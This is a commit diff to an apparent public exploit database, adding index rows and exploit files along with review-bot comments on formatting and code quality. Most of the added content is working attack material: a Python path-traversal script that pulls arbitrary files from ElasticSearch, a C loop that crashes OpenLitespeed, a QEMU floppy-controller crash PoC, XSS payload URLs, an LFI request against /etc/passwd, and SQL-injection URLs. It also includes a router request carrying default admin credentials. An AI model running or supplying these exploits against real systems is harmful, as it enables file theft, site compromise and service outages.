Commit eb3be45

Author: Offensive Security (committed)
DB: 2015-05-22
17 new exploits
1 parent 62ba41a commit eb3be45

18 files changed

Lines changed: 907 additions & 1 deletion

files.csv

Lines changed: 18 additions & 1 deletion
Original file line number | Diff line number | Diff line change
@@ -6985,7 +6985,7 @@ id,file,description,date,author,platform,type,port
69856985
7441,platforms/php/webapps/7441.txt,"joomla live chat (sql/proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0
69866986
7442,platforms/windows/remote/7442.txt,"TmaxSoft JEUS Alternate Data Streams File Disclosure Vulnerability",2008-12-12,"Simon Ryeo",windows,remote,0
69876987
7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability",2008-12-14,Osirys,php,webapps,0
6988-
7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script 1.0.6 - (DD/RFI) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0
6988+
7444,platforms/php/webapps/7444.txt,"Simple Text-File Login script (SiTeFiLo) 1.0.6 - (DD/RFI) Multiple Vulnerabilities",2008-12-14,Osirys,php,webapps,0
69896989
7445,platforms/asp/webapps/7445.txt,"Discussion Web 4 - Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0
69906990
7446,platforms/asp/webapps/7446.txt,"ASPired2Quote (quote.mdb) Remote Database Disclosure Vulnerability",2008-12-14,Pouya_Server,asp,webapps,0
69916991
7447,platforms/asp/webapps/7447.txt,"ASP-DEV Internal E-Mail System (Auth Bypass) SQL Injection Vuln",2008-12-14,Pouya_Server,asp,webapps,0
@@ -33392,6 +33392,7 @@ id,file,description,date,author,platform,type,port
3339233392
37002,platforms/php/webapps/37002.txt,"Open Journal Systems (OJS) 2.3.6 /lib/pkp/lib/tinymce/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php param Parameter Multiple Function Traversal Arbitrary File Manipulation",2012-03-21,"High-Tech Bridge",php,webapps,0
3339333393
37003,platforms/php/webapps/37003.txt,"WordPress Booking Calendar Contact Form 1.0.2 - Multiple vulnerabilities",2015-05-13,"i0akiN SEC-LABORATORY",php,webapps,0
3339433394
37004,platforms/php/webapps/37004.txt,"PHPCollab 2.5 - SQL Injection",2015-05-13,"Wad Deek",php,webapps,0
33395+
37005,platforms/hardware/webapps/37005.txt,"IPLINK IP-DL-801RT-B - (Url Filter Configuration Panel) Stored XSS",2015-05-13,"XoDiAK BlackHat",hardware,webapps,0
3339533396
37007,platforms/linux/remote/37007.txt,"AtMail 1.04 Multiple Security Vulnerabilities",2012-03-22,"Yury Maryshev",linux,remote,0
3339633397
37008,platforms/php/webapps/37008.txt,"Event Calendar PHP 'cal_year' Parameter Cross Site Scripting Vulnerability",2012-03-24,3spi0n,php,webapps,0
3339733398
37009,platforms/java/webapps/37009.xml,"Apache Struts 2.0 'XSLTResult.java' Remote Arbitrary File Upload Vulnerability",2012-03-23,voidloafer,java,webapps,0
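Review bot: the author field of the new 37005 row, "XoDiAK BlackHat", does not match the name the advisory file itself gives in its "# Exploit Author" header ("Xodiak"); pick one spelling so the CSV stays searchable by author. The row is otherwise consistent with its file path (platforms/hardware/webapps/37005.txt) and is inserted in id order between 37004 and 37007.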
@@ -33434,6 +33435,11 @@ id,file,description,date,author,platform,type,port
3343433435
37046,platforms/php/webapps/37046.txt,"osCMax 2.5 admin/new_attributes_include.php Multiple Parameter XSS",2012-04-04,"High-Tech Bridge SA",php,webapps,0
3343533436
37047,platforms/php/webapps/37047.html,"osCMax 2.5 admin/login.php username Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
3343633437
37048,platforms/php/webapps/37048.txt,"osCMax 2.5 admin/stats_monthly_sales.php status Parameter SQL Injection",2012-04-04,"High-Tech Bridge SA",php,webapps,0
33438+
37049,platforms/windows/local/37049.txt,"Microsoft Windows - Local Privilege Escalation (MS15-051)",2015-05-18,hfiref0x,windows,local,0
33439+
37051,platforms/linux/dos/37051.c,"OpenLitespeed 1.3.9 - Use After Free (DoS)",2015-05-18,"Denis Andzakovic",linux,dos,0
33440+
37052,platforms/windows/local/37052.c,"Windows - CNG.SYS Kernel Security Feature Bypass PoC (MS15-052)",2015-05-18,4B5F5F4B,windows,local,0
33441+
37053,platforms/multiple/dos/37053.c,"QEMU - Floppy Disk Controller (FDC) PoC",2015-05-18,"Marcus Meissner",multiple,dos,0
33442+
37054,platforms/php/webapps/37054.py,"ElasticSearch < 1.4.5 / < 1.5.2 - Path Transversal",2015-05-18,pandujar,php,webapps,0
3343733443
37055,platforms/php/webapps/37055.txt,"Forma LMS 1.3 Multiple PHP Object Injection Vulnerabilities",2015-05-18,"Filippo Roncari",php,webapps,80
3343833444
37056,platforms/windows/local/37056.py,"BulletProof FTP Client 2010 - Buffer Overflow (DEP Bypass)",2015-05-18,"Gabor Seljan",windows,local,0
3343933445
37057,platforms/ios/webapps/37057.txt,"Wireless Photo Transfer 3.0 iOS - File Inclusion Vulnerability",2015-05-18,Vulnerability-Lab,ios,webapps,80
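Review bot: the description of the new 37054 row misspells "Traversal" as "Transversal"; the existing 37002 row in the previous hunk uses "Traversal", and the new row should follow it so that searches match both. The same row files an ElasticSearch PoC under platforms/php/ although nothing in its description or in the added 37054.py header names PHP; check the platform field. Also, the 37051 row writes "OpenLitespeed" while the added 37051.c header calls the product "Openlitespeed"; harmonise the name in one of the two places.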
@@ -33447,3 +33453,14 @@ id,file,description,date,author,platform,type,port
3344733453
37067,platforms/php/webapps/37067.txt,"WordPress FeedWordPress Plugin 2015.0426 - SQL Injection",2015-05-20,"Adrián M. F.",php,webapps,80
3344833454
37068,platforms/windows/dos/37068.py,"ZOC SSH Client Buffer Overflow Vulnerability (SEH)",2015-05-20,"Dolev Farhi",windows,dos,0
3344933455
37069,platforms/lin_x86/shellcode/37069.c,"Linux/x86 execve ""/bin/sh"" - shellcode 26 bytes",2015-05-20,"Reza Behzadpour",lin_x86,shellcode,0
33456+
37070,platforms/php/webapps/37070.txt,"WordPress Uploadify Integration Plugin 0.9.6 Multiple Cross Site Scripting Vulnerabilities",2012-04-06,waraxe,php,webapps,0
33457+
37071,platforms/php/webapps/37071.txt,"CitrusDB 2.4.1 Local File Include and SQL Injection Vulnerabilities",2012-04-09,wacky,php,webapps,0
33458+
37072,platforms/php/webapps/37072.txt,"Matterdaddy Market 1.1 Multiple SQL Injection Vulnerabilities",2012-04-10,"Chokri B.A",php,webapps,0
33459+
37073,platforms/php/webapps/37073.html,"BGS CMS 2.2.1 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-04-11,LiquidWorm,php,webapps,0
33460+
37074,platforms/php/webapps/37074.txt,"WordPress WP Membership Plugin 1.2.3 - Multiple Vulnerabilities",2015-05-21,"Panagiotis Vagenas",php,webapps,0
33461+
37075,platforms/php/webapps/37075.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php title Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
33462+
37076,platforms/php/webapps/37076.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/box_publish_button.php button_value Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
33463+
37077,platforms/php/webapps/37077.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/save_successful.php msg Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
33464+
37078,platforms/php/webapps/37078.txt,"All-in-One Event Calendar Plugin 1.4 for WordPress /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php Multiple Parameter XSS",2012-04-11,"High-Tech Bridge SA",php,webapps,0
33465+
37079,platforms/php/webapps/37079.txt,"Forma LMS 1.3 Multiple SQL Injection Vulnerabilities",2015-05-21,"Filippo Roncari",php,webapps,80
33466+
37080,platforms/php/webapps/37080.txt,"WordPress WP Symposium Plugin 15.1 SQL Injection Vulnerability",2015-05-21,"Hannes Trunde",php,webapps,80
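Review bot: the port field is used inconsistently in this hunk: 37079 and 37080 carry port 80 while 37070 through 37078, which are also webapps rows, carry 0 (the same split appears in the earlier hunk, where 37055 and 37057 use 80 and 37056 uses 0). Settle on one convention for webapps entries, or document that 0 means "platform default". The four All-in-One Event Calendar rows (37075 to 37078) also embed full plugin paths in the description, which makes them far longer than any other row; the path belongs in the advisory file, with the description naming only the script and parameter.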
Lines changed: 44 additions & 0 deletions
@@ -0,0 +1,44 @@
1+
# Exploit Title: IPLINK IP-DL-801RT-B (Url Filter Configuration Panel)
2+
Stored XSS
3+
# Google Dork: N/A
4+
# Date: 13/05/2015
5+
# Exploit Author: Xodiak xodiak.blackhat@gmail.com
6+
# Vendor Homepage: http://iplink.com.tw
7+
# Software Link: N/A
8+
# Version: All Version
9+
# Tested on: Kali Linux
10+
# CVE : N/A
11+
#
12+
Interductions:
13+
A Stored XSS Vulnerability In Url Filter Configuration Panel Discovered.
14+
15+
If Any JavaScript Code Add In Form Can Open Ports , Enable UPNP , Disable
16+
Firewall ,Hijack Bowser By Beef And,etc..
17+
18+
This Can Harm System And Modem :)
19+
20+
POC:
21+
http://192.168.1.1/url_nokeyword.htm
22+
23+
GET /url_nokeyword.htm HTTP/1.1
24+
Host: 192.168.1.1
25+
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:18.0) Gecko/20100101
26+
Firefox/18.0
27+
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
28+
Accept-Language: en-US,en;q=0.5
29+
Accept-Encoding: gzip, deflate
30+
Referer: http://192.168.1.1/code.htm
31+
Authorization: Basic YWRtaW46YWRtaW4=
32+
Connection: keep-alive
33+
34+
HTTP/1.1 200 OK
35+
Server: Virtual Web 0.9
36+
Content-Length: 2690
37+
38+
39+
40+
===================
41+
Greetz :
42+
=-| Milad Hacking, Seravo BlackHat, AC3S , Ehsan Ice , Saeed.J0ker,Alireza
43+
Attacker,MMA Defacer,END3R
44+
Amir Avinny,Abzari,Ali.Yar.RM_MR,SHA13AH And All Of My Friends |-=
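Review bot: the header block is malformed: the "# Exploit Title" line is wrapped so that "Stored XSS" sits on line 2 without the leading "#", which breaks any tooling that reads the "# Key: value" header lines, and "Interductions" should read "Introduction". More importantly, the PoC does not document the vulnerability it claims: it shows a GET of /url_nokeyword.htm and a 200 response, but never names the form field of the URL filter panel that stores the script or the page that later renders it, so a reader cannot verify the finding or write a detection rule for it. "Version: All Version" is also too vague for a database row; record the firmware version that was actually tested. Finally, the captured request carries "Authorization: Basic YWRtaW46YWRtaW4=", which decodes to the default admin:admin credentials; the advisory should say explicitly that the panel is reached as an authenticated administrator, since that is the precondition defenders need to know.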

platforms/linux/dos/37051.c

Lines changed: 161 additions & 0 deletions
@@ -0,0 +1,161 @@
1+
/*
2+
* Openlitespeed 1.3.9 Use After Free denial of service exploit.
3+
*
4+
* This exploit triggers a denial of service condition within the Openlitespeed web
5+
* server. This is achieved by sending a tampered request contain a large number (91)
6+
* of 'a: a' header rows. By looping this request, a memmove call within the HttpReq
7+
* class is triggered with a freed pointer, resulting in a reference to an invalid
8+
* memory location and thus a segmentation fault.
9+
*
10+
* UAF Request:
11+
* GET / HTTP/1.0
12+
* a: a
13+
* a: a
14+
* a: a
15+
* a: a
16+
* a: a
17+
* a: a
18+
* a: a
19+
* a: a
20+
* a: a
21+
* a: a
22+
* a: a
23+
* a: a
24+
* a: a
25+
* a: a
26+
* a: a
27+
* a: a
28+
* a: a
29+
* a: a
30+
* a: a
31+
* a: a
32+
* a: a
33+
* a: a
34+
* a: a
35+
* a: a
36+
* a: a
37+
* a: a
38+
* a: a
39+
* a: a
40+
* a: a
41+
* a: a
42+
* a: a
43+
* a: a
44+
* a: a
45+
* a: a
46+
* a: a
47+
* a: a
48+
* a: a
49+
* a: a
50+
* a: a
51+
* a: a
52+
* a: a
53+
* a: a
54+
* a: a
55+
* a: a
56+
* a: a
57+
* a: a
58+
* a: a
59+
* a: a
60+
* a: a
61+
* a: a
62+
* a: a
63+
* a: a
64+
* a: a
65+
* a: a
66+
* a: a
67+
* a: a
68+
* a: a
69+
* a: a
70+
* a: a
71+
* a: a
72+
* a: a
73+
* a: a
74+
* a: a
75+
* a: a
76+
* a: a
77+
* a: a
78+
* a: a
79+
* a: a
80+
* a: a
81+
* a: a
82+
* a: a
83+
* a: a
84+
* a: a
85+
* a: a
86+
* a: a
87+
* a: a
88+
* a: a
89+
* a: a
90+
* a: a
91+
* a: a
92+
* a: a
93+
* a: a
94+
* a: a
95+
* a: a
96+
* a: a
97+
* a: a
98+
* a: a
99+
* a: a
100+
* a: a
101+
* a: a
102+
* a: a
103+
*
104+
* The above request should be placed into a file name 'uafcrash' prior to running this
105+
* exploit code.
106+
*
107+
* Date: 24/03/2015
108+
* Author: Denis Andzakovic - Security-Assessment.com
109+
*
110+
*/
111+
112+
#include <stdio.h>
113+
#include <string.h>
114+
#include <unistd.h>
115+
#include <sys/socket.h>
116+
#include <arpa/inet.h>
117+
#include <errno.h>
118+
119+
extern int errno;
120+
121+
int main(int argc, char ** argv){
122+
FILE * fp;
123+
size_t len = 0;
124+
char * line;
125+
if((fp = fopen("uafcrash", "r")) == NULL){
126+
fprintf(stderr, "[!] Error: Could not open file uafcrash: %s", strerror(errno));
127+
return 1;
128+
}
129+
130+
char * host = "127.0.0.1";
131+
int port = 8088;
132+
int count = 0;
133+
int sock;
134+
struct sockaddr_in serv_addr;
135+
while(1){
136+
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0){
137+
fprintf(stderr, "[!] Error: Could not create socket \n");
138+
return 1;
139+
}
140+
141+
serv_addr.sin_family = AF_INET;
142+
serv_addr.sin_port = htons(port);
143+
inet_pton(AF_INET, host, &serv_addr.sin_addr);
144+
145+
if(connect(sock, (struct sockaddr *)&serv_addr, sizeof(serv_addr))<0){
146+
fprintf(stderr, "[!] Error: Could not connect! Check for server crash! Total cases sent:%d\n", count);
147+
close(sock);
148+
return 1;
149+
}
150+
while ((getline(&line, &len, fp)) != -1){
151+
152+
write(sock, line, strlen(line));
153+
}
154+
155+
close(sock);
156+
rewind(fp);
157+
count++;
158+
}
159+
160+
return 42;
161+
}
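Review bot: `char * line;` is never initialised, yet it is passed to getline() together with `len = 0`; POSIX requires *lineptr to be NULL or a buffer obtained from malloc, so this is undefined behaviour that only works by accident of the glibc implementation. Initialise it as `char * line = NULL;`. `extern int errno;` is redundant with the `#include <errno.h>` directly above and is non-portable (errno is a macro in glibc and other libcs); remove it. Smaller points: `serv_addr` is never zeroed (memset it before filling the fields), the return value of write() is ignored so a reset connection inside the header loop goes unnoticed, `line` is never freed, and `return 42;` after `while(1)` is unreachable. The header comment is otherwise good: the "(91)" matches the 91 `a: a` lines shown, and the note that the request must be saved as 'uafcrash' is the kind of usage detail other entries in this commit lack.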

platforms/multiple/dos/37053.c

Lines changed: 14 additions & 0 deletions
@@ -0,0 +1,14 @@
1+
// Source: https://marc.info/?l=oss-security&m=143155206320935&w=2
2+
3+
#include <sys/io.h>
4+
5+
#define FIFO 0x3f5
6+
7+
int main() {
8+
int i;
9+
iopl(3);
10+
11+
outb(0x0a,0x3f5); /* READ ID */
12+
for (i=0;i<10000000;i++)
13+
outb(0x42,0x3f5); /* push */
14+
}
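Review bot: the FIFO macro is defined but never used; both outb() calls hard-code 0x3f5 instead, so either write `outb(0x0a, FIFO)` or drop the define. iopl(3) returns -1 with EPERM when the process lacks the privilege to raise its I/O level, and that return value is unchecked, so an unprivileged run dies with SIGSEGV on the first outb() rather than reporting the cause; check the result and print an error (which also needs `#include <stdio.h>`). A one-line comment above main() stating that this is a guest-side PoC expected to crash or hang the emulator, rather than a reliable trigger, would make the entry self-describing; the source link is good.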

platforms/php/webapps/37054.py

Lines changed: 56 additions & 0 deletions
@@ -0,0 +1,56 @@
1+
#!/usr/bin/python
2+
# Crappy PoC for CVE-2015-3337 - Reported by John Heasman of DocuSign
3+
# Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5
4+
# Pedro Andujar || twitter: pandujar || email: @segfault.es || @digitalsec.net
5+
# Tested on default Linux (.deb) install /usr/share/elasticsearch/plugins/
6+
#
7+
# Source: https://github.com/pandujar/elasticpwn/
8+
9+
import socket, sys
10+
11+
print "!dSR ElasticPwn - for CVE-2015-3337\n"
12+
if len(sys.argv) <> 3:
13+
print "Ex: %s www.example.com /etc/passwd" % sys.argv[0]
14+
sys.exit()
15+
16+
port = 9200 # Default ES http port
17+
host = sys.argv[1]
18+
fpath = sys.argv[2]
19+
20+
def grab(plugin):
21+
socket.setdefaulttimeout(3)
22+
s = socket.socket()
23+
s.connect((host,port))
24+
s.send("GET /_plugin/%s/../../../../../..%s HTTP/1.0\n"
25+
"Host: %s\n\n" % (plugin, fpath, host))
26+
file = s.recv(2048)
27+
print " [*] Trying to retrieve %s:" % fpath
28+
if ("HTTP/1.0 200 OK" in file):
29+
print "\n%s" % file
30+
else:
31+
print "[-] File Not Found, No Access Rights or System Not Vulnerable"
32+
33+
def pfind(plugin):
34+
try:
35+
socket.setdefaulttimeout(3)
36+
s = socket.socket()
37+
s.connect((host,port))
38+
s.send("GET /_plugin/%s/ HTTP/1.0\n"
39+
"Host: %s\n\n" % (plugin, host))
40+
file = s.recv(16)
41+
print "[*] Trying to find plugin %s:" % plugin
42+
if ("HTTP/1.0 200 OK" in file):
43+
print "[+] Plugin found!"
44+
grab(plugin)
45+
sys.exit()
46+
else:
47+
print "[-] Not Found "
48+
except Exception, e:
49+
print "[-] Error connecting to %s: %s" % (host, e)
50+
sys.exit()
51+
52+
# Include more plugin names to check if they are installed
53+
pluginList = ['test','kopf', 'HQ', 'marvel', 'bigdesk', 'head']
54+
55+
for plugin in pluginList:
56+
pfind(plugin)
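Review bot: the script is Python 2 only (`print` statements, the `<>` operator, `except Exception, e`) but neither the shebang nor the header says so; `#!/usr/bin/python` resolves to Python 3 on current systems and the file then fails at compile time. State the interpreter in the header or use `#!/usr/bin/env python2`. In addition, grab() has no try/except while pfind() does, so the 3-second timeout it sets raises an unhandled socket.timeout; neither function closes its socket; and `file` shadows the Python 2 builtin. The header also says "Affects all ElasticSearch versions prior to 1.5.2 and 1.4.5" while the CSV row writes "< 1.4.5 / < 1.5.2"; keep one form.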

platforms/php/webapps/37070.txt

Lines changed: 46 additions & 0 deletions
@@ -0,0 +1,46 @@
1+
source: http://www.securityfocus.com/bid/52944/info
2+
3+
Uploadify Integration plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
4+
5+
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
6+
7+
Uploadify Integration 0.9.6 is vulnerable; other prior versions may also be affected.
8+
9+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
10+
shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
11+
12+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
13+
shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>
14+
15+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
16+
shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>
17+
18+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
19+
shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>
20+
21+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
22+
shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>
23+
24+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
25+
shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>
26+
27+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
28+
shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>
29+
30+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
31+
shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>
32+
33+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
34+
shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>
35+
36+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
37+
shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>
38+
39+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
40+
partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>
41+
42+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
43+
partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>
44+
45+
http://www.example.com/wp331/wp-content/plugins/uploadify-integration/views/scripts/
46+
file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>
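Review bot: every PoC URL in the file is split across two physical lines after "views/scripts/", so copying a line yields a broken URL and a grep for the parameter name does not find the host path; join each URL onto one line. The "wp331" path segment is specific to the reporter's installation and should be marked as such next to the version line, since plugin paths are otherwise fixed under /wp-content/plugins/. Apart from that the entry does name the script and parameter for each of the thirteen vectors, which is what a WAF or log rule needs.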

platforms/php/webapps/37071.txt

Lines changed: 9 additions & 0 deletions
@@ -0,0 +1,9 @@
1+
source: http://www.securityfocus.com/bid/52946/info
2+
3+
CitrusDB is prone to a local file-include vulnerability and an SQL-injection vulnerability.
4+
5+
An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver.
6+
7+
CitrusDB 2.4.1 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/lab/citrus-2.4.1/index.php?load=../../../../../etc/passwd%00&type=base
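Review bot: the text promises both a local file-include and an SQL-injection vulnerability, but the only PoC given is the LFI request (index.php?load=../../../../../etc/passwd%00&type=base); the SQL-injection parameter and any proof are missing, so the CSV description "Local File Include and SQL Injection Vulnerabilities" is not backed by the file. Either add the SQL-injection details from the SecurityFocus source or narrow the description to what is documented.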

platforms/php/webapps/37072.txt

Lines changed: 11 additions & 0 deletions
@@ -0,0 +1,11 @@
1+
source: http://www.securityfocus.com/bid/52970/info
2+
3+
Matterdaddy Market is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
4+
5+
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
6+
7+
Matterdaddy Market 1.1 is vulnerable; other versions may also be affected.
8+
9+
http://www.example.com/mdmarket/admin/controller.php?cat_name=1&cat_order=-1%27[SQL INJECTION]&add=Add+Category&op=newCategory
10+
11+
http://www.example.com/mdmarket/admin/controller.php?cat_name=-1%27[SQL INJECTION]&cat_order=1&add=Add+Category&op=newCategory
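Review bot: the two PoC URLs use the literal placeholder "[SQL INJECTION]" while the surrounding quote is already URL-encoded as %27; mark the placeholder consistently (encode the brackets or state in the text that the bracketed token is to be replaced), otherwise a reader may submit the brackets verbatim. The file also says "multiple SQL-injection vulnerabilities" yet both requests go to the same admin/controller.php newCategory operation and differ only in which of cat_order or cat_name carries the injection; say so explicitly, since these are two parameters of one request handler rather than separate issues.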
